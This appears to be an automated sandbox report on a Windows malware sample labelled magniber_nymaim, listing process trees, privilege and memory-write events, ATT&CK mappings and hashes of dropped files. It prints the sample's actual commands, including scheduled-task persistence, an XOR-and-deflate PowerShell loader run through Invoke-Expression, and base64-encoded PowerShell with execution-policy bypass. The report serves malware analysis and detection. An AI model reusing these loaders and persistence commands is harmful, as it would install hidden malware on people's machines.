2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
3916	powershell.exe
3916	powershell.exe
2680	powershell.exe
2680	powershell.exe
1080	powershell.exe
3916	powershell.exe
2680	powershell.exe
1080	powershell.exe
1080	powershell.exe
552	wmntnnc
552	wmntnnc

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2440	ProductInst.exe
Token: SeIncreaseQuotaPrivilege	2440	ProductInst.exe
Token: SeSecurityPrivilege	2064	msiexec.exe
Token: SeCreateTokenPrivilege	2440	ProductInst.exe
Token: SeAssignPrimaryTokenPrivilege	2440	ProductInst.exe
Token: SeLockMemoryPrivilege	2440	ProductInst.exe
Token: SeIncreaseQuotaPrivilege	2440	ProductInst.exe
Token: SeMachineAccountPrivilege	2440	ProductInst.exe
Token: SeTcbPrivilege	2440	ProductInst.exe
Token: SeSecurityPrivilege	2440	ProductInst.exe
Token: SeTakeOwnershipPrivilege	2440	ProductInst.exe
Token: SeLoadDriverPrivilege	2440	ProductInst.exe
Token: SeSystemProfilePrivilege	2440	ProductInst.exe
Token: SeSystemtimePrivilege	2440	ProductInst.exe
Token: SeProfSingleProcessPrivilege	2440	ProductInst.exe
Token: SeIncBasePriorityPrivilege	2440	ProductInst.exe
Token: SeCreatePagefilePrivilege	2440	ProductInst.exe
Token: SeCreatePermanentPrivilege	2440	ProductInst.exe
Token: SeBackupPrivilege	2440	ProductInst.exe
Token: SeRestorePrivilege	2440	ProductInst.exe
Token: SeShutdownPrivilege	2440	ProductInst.exe
Token: SeDebugPrivilege	2440	ProductInst.exe
Token: SeAuditPrivilege	2440	ProductInst.exe
Token: SeSystemEnvironmentPrivilege	2440	ProductInst.exe
Token: SeChangeNotifyPrivilege	2440	ProductInst.exe
Token: SeRemoteShutdownPrivilege	2440	ProductInst.exe
Token: SeUndockPrivilege	2440	ProductInst.exe
Token: SeSyncAgentPrivilege	2440	ProductInst.exe
Token: SeEnableDelegationPrivilege	2440	ProductInst.exe
Token: SeManageVolumePrivilege	2440	ProductInst.exe
Token: SeImpersonatePrivilege	2440	ProductInst.exe
Token: SeCreateGlobalPrivilege	2440	ProductInst.exe
Token: SeAuditPrivilege	3696	svchost.exe
Token: SeSecurityPrivilege	3696	svchost.exe
Token: SeLockMemoryPrivilege	3300	idle_maintenance.exe
Token: SeLockMemoryPrivilege	3300	idle_maintenance.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2440	ProductInst.exe
552	wmntnnc
552	wmntnnc
552	wmntnnc

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
552	wmntnnc
552	wmntnnc
552	wmntnnc

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2440	ProductInst.exe
2440	ProductInst.exe
2440	ProductInst.exe
2440	ProductInst.exe
552	wmntnnc

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 4920 wrote to memory of 4084	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	85
PID 4920 wrote to memory of 4084	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	85
PID 4920 wrote to memory of 4084	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	85
PID 4084 wrote to memory of 3504	4084	cmd.exe	87
PID 4084 wrote to memory of 3504	4084	cmd.exe	87
PID 4084 wrote to memory of 3504	4084	cmd.exe	87
PID 4920 wrote to memory of 1312	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	88
PID 4920 wrote to memory of 1312	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	88
PID 4920 wrote to memory of 1312	4920	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	88
PID 4084 wrote to memory of 2572	4084	cmd.exe	90
PID 4084 wrote to memory of 2572	4084	cmd.exe	90
PID 4084 wrote to memory of 2572	4084	cmd.exe	90
PID 1312 wrote to memory of 4596	1312	cmd.exe	91
PID 1312 wrote to memory of 4596	1312	cmd.exe	91
PID 1312 wrote to memory of 4596	1312	cmd.exe	91
PID 1312 wrote to memory of 684	1312	cmd.exe	92
PID 1312 wrote to memory of 684	1312	cmd.exe	92
PID 1312 wrote to memory of 684	1312	cmd.exe	92
PID 1312 wrote to memory of 4764	1312	cmd.exe	93
PID 1312 wrote to memory of 4764	1312	cmd.exe	93
PID 1312 wrote to memory of 4764	1312	cmd.exe	93
PID 684 wrote to memory of 1380	684	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	95
PID 684 wrote to memory of 1380	684	2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe	95
PID 1380 wrote to memory of 2440	1380	Setup.exe	96
PID 1380 wrote to memory of 2440	1380	Setup.exe	96
PID 3696 wrote to memory of 2732	3696	svchost.exe	108
PID 3696 wrote to memory of 2732	3696	svchost.exe	108
PID 4504 wrote to memory of 3300	4504	maintenance.exe	113
PID 4504 wrote to memory of 3300	4504	maintenance.exe	113
PID 4504 wrote to memory of 2368	4504	maintenance.exe	115
PID 4504 wrote to memory of 2368	4504	maintenance.exe	115
PID 4504 wrote to memory of 2368	4504	maintenance.exe	115
PID 2368 wrote to memory of 1080	2368	powershell.exe	117
PID 2368 wrote to memory of 1080	2368	powershell.exe	117
PID 2368 wrote to memory of 1080	2368	powershell.exe	117
PID 2368 wrote to memory of 1984	2368	powershell.exe	118
PID 2368 wrote to memory of 1984	2368	powershell.exe	118
PID 2368 wrote to memory of 1984	2368	powershell.exe	118
PID 2368 wrote to memory of 3916	2368	powershell.exe	119
PID 2368 wrote to memory of 3916	2368	powershell.exe	119
PID 2368 wrote to memory of 3916	2368	powershell.exe	119
PID 2368 wrote to memory of 2680	2368	powershell.exe	120
PID 2368 wrote to memory of 2680	2368	powershell.exe	120
PID 2368 wrote to memory of 2680	2368	powershell.exe	120
PID 1984 wrote to memory of 552	1984	wmntnnc	121
PID 1984 wrote to memory of 552	1984	wmntnnc	121
PID 1984 wrote to memory of 552	1984	wmntnnc	121
PID 2680 wrote to memory of 996	2680	powershell.exe	122
PID 2680 wrote to memory of 996	2680	powershell.exe	122
PID 2680 wrote to memory of 996	2680	powershell.exe	122

C:\Users\Admin\AppData\Local\Temp\2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe2024104122744534.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /delete /tn "Maintenance" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3504
- - C:\Windows\SysWOW64\schtasks.exe
    Schtasks.Exe /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx2024104122744534.xml"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb2024104122744534.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1312
- - C:\Windows\SysWOW64\chcp.com
    chcp 1251
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-04_32bc051ff64f31196eb4128c8076abc5_magniber_nymaim.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\7zS5CD4\Setup.exe
      .\Setup.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1380
    - - C:\Users\Admin\AppData\Local\Temp\7zS5CD4\ProductInst.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5CD4\ProductInst.exe" PRODUCTI
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2440
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:4764

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "20" "C:\Users\Admin\AppData\Local\Temp\{f6bfe8b4-2f97-bf41-a390-19e1faa9cb9d}\HPLJ1020.INF" "9" "4049cdc8b" "0000000000000150" "WinSta0\Default" "0000000000000138" "208" "C:\Users\Admin\AppData\Local\Temp\7zS5CD4"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID:2732

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe .
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Users\Admin\AppData\Local\Temp\574c574f42565156518465686481666485996339224\idle_maintenance.exe
  C:\Users\Admin\AppData\Local\Temp\574c574f42565156518465686481666485996339224\idle_maintenance.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3300
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -c "if($host.version.major -lt 3){exit}$d =[IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Roaming\Maintenance\mod');$l=$d.Count;$m = New-Object Byte[] $l;[byte[]] $x=167,210,47,237,224,112,179,130;$j=0;for($i=0;$i -lt $l;$i++){$m[$i]=$d[$i] -bxor $x[$j];$j++;if($j -ge 8){$j=0}}$a = New-Object IO.MemoryStream(,$m);$b = New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream($a,[IO.Compression.CompressionMode]::Decompress));$c=$b.ReadToEnd();$b.Close();$a.Close();Invoke-Expression($c)"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand ZgB1AG4AYwB0AGkAbwBuACAAYwBoAGsAcAByAGMAKAAkAHAAKQB7AA0ACgAgACgAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAC4AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAALQBjAG8AbgB0AGEAaQBuAHMAIAAiACQAcAAiACkADQAKAH0ADQAKAGkAZgAoAGMAaABrAHAAcgBjACgAJwBtAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwApACkAewANAAoAIABXAGEAaQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACcAbQBhAGkAbgB0AGUAbgBhAG4AYwBlACcADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHcAbQBuAHQAbgBuAGMAJwApACkAewANAAoAIAAgAFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcAIAAtAEYAbwByAGMAZQANAAoAIAAgAFcAYQBpAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJwB3AG0AbgB0AG4AbgBjACcADQAKACAAfQAgAA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwAtACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAaQBmACgAYwBoAGsAcAByAGMAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwApACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AcAByAG8AYwBlAHMAcwBuAGEAbQBlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEYAbwByAGMAZQB9AA0ACgAgAGUAeABpAHQADQAKAH0A
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
    ".\wmntnnc"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Users\Admin\AppData\Roaming\Maintenance\wmntnnc
      ".\wmntnnc"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand JABwAGEAdABoAD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA0ACgANAAoAJABiAGkAbgBmAG4APQAwAA0ACgBkAG8AIAB7AA0ACgAgACQAZgBpAGwAZQBzACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHAAYQB0AGgAIAAtAEYAaQBsAHQAZQByACAAXwBNAEUASQAqAA0ACgAgAEYAbwByAEUAYQBjAGgAIAAoACQAZgBuACAAaQBuACAAJABmAGkAbABlAHMAKQAgAHsADQAKACAAIAAkAGIAaQBuAGYAbgA9ACQAcABhAHQAaAArACcAXAAnACsAJABmAG4ALgBuAGEAbQBlACsAJwBcAFEAdABHAHUAaQA0AC4AZABsAGwAJwANAAoAIAB9AA0ACgAgAGkAZgAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADEAMAAwAH0ADQAKAH0ADQAKAHcAaABpAGwAZQAoAC0AbgBvAHQAIAAkAGIAaQBuAGYAbgApAA0ACgANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACQAYgBpAG4AZgBuACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoADQAKACQAZgBzAD0AMAANAAoAZABvAHsADQAKACAAdAByAHkAewAkAGYAcwAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGIAaQBuAGYAbgApAH0ADQAKACAAYwBhAHQAYwBoAHsAJABmAHMAPQAwAH0ADQAKACAAaQBmACgALQBuAG8AdAAgACQAZgBzACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQANAAoAfQANAAoAdwBoAGkAbABlACgALQBuAG8AdAAgACQAZgBzACkADQAKAA0ACgAkAGEAPQA1ADEANwA2ADEAOAA2AA0ACgAkAG4APQA0AA0ACgAkAGYAcwAuAFMAZQBlAGsAKAAkAGEALABbAEkATwAuAFMAZQBlAGsATwByAGkAZwBpAG4AXQA6ADoAQgBlAGcAaQBuACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAbgA7ACQAaQArACsAKQB7ACQAZgBzAC4AVwByAGkAdABlAEIAeQB0AGUAKAAwACkAfQANAAoAJABmAHMALgBDAGwAbwBzAGUAKAApACAADQAKAGUAeABpAHQA
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -encodedCommand dwBoAGkAbABlACgALQBuAG8AdAAgAFsASQBPAC4ARgBpAGwAZQBdADoAOgBFAHgAaQBzAHQAcwAoACcALgBcAHMAaQBuAGcAbABlAHQAbwBuAC4AbABvAGMAawAnACkAKQB7AA0ACgAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAANAAoAfQANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAxADAAMAAwADsAJABpACsAKwApAA0ACgB7AA0ACgAgACQAcAByAHQAYwA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AQAB7AA0ACgAgACAAUwB0AGEAcgB0AEkAbgBmAG8AIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFMAdABhAHIAdABJAG4AZgBvAF0AQAB7AA0ACgAgACAAVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIABGAGkAbABlAE4AYQBtAGUAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AYQBpAG4AdABlAG4AYQBuAGMAZQBcAGEAcABwAHMAXABtAGEAaQBuAHQAZQBuAGEAbgBjAGUALgBlAHgAZQAnAA0ACgAgACAAQQByAGcAdQBtAGUAbgB0AHMAIAA9ACAAJwArACcADQAKACAAIABDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAIAA9ACAAJABmAGEAbABzAGUADQAKACAAIAB9AA0ACgAgAH0ADQAKACAAJABwAHIAdABjAC4AUwB0AGEAcgB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACAAJABwAHIAdABjAC4AVwBhAGkAdABGAG8AcgBFAHgAaQB0ACgAKQANAAoAIAANAAoAIABpAGYAKAAkAHAAcgB0AGMALgBFAHgAaQB0AEMAbwBkAGUAIAAtAGUAcQAgADcANwA3ACkAewBiAHIAZQBhAGsAfQANAAoAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKACAAZQB4AGkAdAANAAoAfQA=
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe
      "C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe" +
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\1020.log

Filesize
3KB

MD5
1de4d283751089669c054cecb1806b3c

SHA1
dd9e651abee1cc430adfe3019e9cd58210ab1c2b

SHA256
9647e36044c490d5118f3ab0a29582e9fbe7b279a8eff164e4833de765db140d

SHA512
60df090b71b4eac481e274be116353a2a8f65956a71bd89074891f06b98335670b81e805629b2362fc616cfbe20b2f9c44e7a73f4e67a8b2021f0a87fb43036f

Download Submit
C:\1020.log

Filesize
4KB

MD5
8e8fced46aa730a0383e914bb73a7676

SHA1
1da3ca48dad57e34635b41e76b48b030033ae7be

SHA256
fd820744110625e5bf69f0450a03d3dd5bc18d527597e1fd444243ede01b10cc

SHA512
4f0e43772e8a7eed1352816cca480d3de2f665405a5b3400cec53519f127be4ad8496de6da9a886443fb600a1583b8b5df9e8150b186f5e70523181a66c0238a

Download Submit
C:\1020.log

Filesize
2KB

MD5
0a72d9ed10c31004ddd8f96507f1ec89

SHA1
fca7f567402c1d04705c45167b2ccbbd295c64d2

SHA256
0737cc3e10faa1677e2a9731692207b54a6bddb765c05a403a30b8e3ff6938ff

SHA512
0e0222c8dbee1e5f93a88fbac6612a5287092787e120e96907be6a793632f000da7ebfee7253a673cf8f130bc955a9a07b034c84eaed8f9279e00eb31873390f

Download Submit
C:\Users\Admin\AppData\Local\Temp\574c574f42565156518465686481666485996339224\config.json

Filesize
3KB

MD5
71bd38378091d4af9de0f79adbc690e1

SHA1
d7acf513cce6e8bb9296915a6539b931537a20f2

SHA256
4f6352dbf4a57d7263a2090e5fe250c828a47b55992fbb4862a2acba23741cbf

SHA512
dae2e2cce437aeac443d436b6306f21f4d63df6efe9ff622523437f3e2ef308a042732effb7d0a22608d53b5fd3c67840c919be4b5a33f6c9d89506f88218a08

Download Submit
C:\Users\Admin\AppData\Local\Temp\574c574f42565156518465686481666485996339224\idle_maintenance.exe

Filesize
3.5MB

MD5
e2af153ed50cb5ef457972e656f1bc51

SHA1
efe31f03ec2ce99ba4ff8d573734fc4259a28edf

SHA256
043f0954abf32bf6d1669cf456a439accc7421af3ee7608e23c8e2b6e6a27c1c

SHA512
2576c511868849ab258ef0bbe2fb3cbfe72eb02dc0ab5f4d7004d7a59ff5bfba035f54a2dc7ca55d569f51d2f4de654643fafa29905b32e1b1b498ff050c699e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\DIFxAPI.dll

Filesize
513KB

MD5
f5558c67a3adb662d43d40a1cbde4160

SHA1
74ad5dd123037cf4d434c5073cbe04c0bcba4e79

SHA256
83c43d65084cd202aa9982af6d87c963a05035f1e2cdac48304fa299584e3242

SHA512
6df9f780adda4f52d7fbb3baa6af3028c0523ff514f1df0e7dfe380ce21116e09a6f1f3820c316a9af7e16043eb04cdbfe5e885ca24528661c05e32cd18b2046

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\SDhp1018.chm

Filesize
13KB

MD5
cc0a048234f14f413641e3671633b955

SHA1
668a90552b483c964c73eaadcaf04195ff37e8ac

SHA256
a00bf1461d16d6701e172ec19d2de1e4e655720a8ef2a07d7b91718b33d0e831

SHA512
bf3d58492d3aee2173c3b5b60d309e7f57c17e00cfc35c7f004f852354332d1cfcdbba8a8d50db6c0680c388718d8bd0ada4fe4ae4e004f02ecaad4f0933bdb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\SDhp1020.SDD

Filesize
5KB

MD5
0029895905ac5f7ce40bd3506aaf6c1a

SHA1
187115f932ec9b8a90c7e08b7d7a39916118c1e3

SHA256
9bed6c7c9d63c39984000542633da36b6be8889104a5edea29d002911b7baa16

SHA512
b7024f51d5a71c6f67afb2f59c904d9e4411a10a3814e4181e7478329567270f071f6b1cbcf968a76775d72eb3a27346240d6e019f961c7fdc5fabbed22b77cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\SDhp1020.chm

Filesize
13KB

MD5
ec5ca899b688d5baae797e2405c9dc91

SHA1
611b7998324ba0e7545934e8a19e7f74cf5ccda9

SHA256
3594e3bdaaa541825d2ad0193c97fa9bd970948dc7eb38616337b2aa638bf9ca

SHA512
20cead0399a51662238ad32f3ed7e9a81322bea9d1ca586d2cada5691216f44eb0560ec3140b39d082d2e6cb733ed2de90951e238de84f65b1cf90d4747c383b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\SUhp1020.ent

Filesize
20KB

MD5
0e0c1d80fdb397c16e272aafb9f9434b

SHA1
5f2f26b94ea3c2b408ed9e1779fc7104aebd3c02

SHA256
4fbfd5284d25fe64601f3822e44afa6a544c8c1facd43236e7b6529bf9e5c96c

SHA512
bbf819ddb5212d4fc0c95c01a69c963c79c1853e0bbec1ed927fee462f8d7b7c9679fed8f47d5d0fa594db109743f4f476b7bf5b920d3759abf223c1effa3466

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\ZShp1018.chm

Filesize
10KB

MD5
295be7b1f6cb4998189233f289fb01f5

SHA1
bd29eded6554412691bdc9394765427b3e586430

SHA256
274e851a691bd50c0cc039c01e79a515cf4451b4312b17dde5f46c4302d2a081

SHA512
3485d94ccec191f94f8c1d42df54c64d2208532a8c405fa86f093093b8153048b36bd822c9f95ff3cc063c76a1453d3ec676d3815fa351aa20f7cacc133d493c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\ZShp1020.chm

Filesize
10KB

MD5
c671ed21e6d27c94a49a754e975f5e0a

SHA1
862e94c7d4cb5eb373eb4c63b337ac4bc32f1466

SHA256
612a2422fa4bdee88484e8ff445b8a2de9f1ad771655fcccedcc1bed7bbef81b

SHA512
c39db89000c1af445d3ac3bcd007813c8426e371cca00a12de0afa0e3e76260e9200051dd56bd73c28559871e92583494b254d312b9d04e61d024173dead4b27

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\English\zshp1020s.dll

Filesize
239KB

MD5
6278f030f7fb7c7ffc5424abfecfc9e9

SHA1
f752764eca0d47accc45cff12b4673b629a4d0b5

SHA256
b2caa8fe1e411e80711b80337d67ac6e3b46ec6eb8fe685edf782a16d8532541

SHA512
3402e28ae04dd2c9df2db214c6208217d84103ff13f9fe91a4ed02ffcd2f2ca6726721a958f5bec41e2313de6fe9f072cbaf3cc3077589c251a9cbcbdc7f713c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\HPLJ1020.INF

Filesize
5KB

MD5
baa2c952431f5e91791d804280e14bbf

SHA1
6909269df361b18fedbbcd689aba8498176c235a

SHA256
c8492e9c62ae7b47b93d5480127b0b615ec7017d642739209adde43e4f1ec776

SHA512
8a4514eb4d0c5f621193449cfcef3d98d2d7559c46f9b46def3e955b111beb16cb8305db2de3c5b0a759d38fdbbb240636738f1ae7fd94a0d5527f31fcedda83

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5CD4\License7z.txt

Filesize
2KB

MD5
1aff779c3f376c276e0c382beb803851

SHA1
f93bfaaaf385444c9d89e1c3560456e2b87fb451

SHA256
264be4477e3a7589ce4114dafa3aef8ee91c9cc862ac2aa397c70875136c778a

SHA512
317536b5802df4f3cc6beab7e3654d1ba04ec50e62e62c974ec53b6eff086e70e19acecafb10a2763a08744b1b872632ecb20376d97b6e4908c159fa40898c81

Download Submit
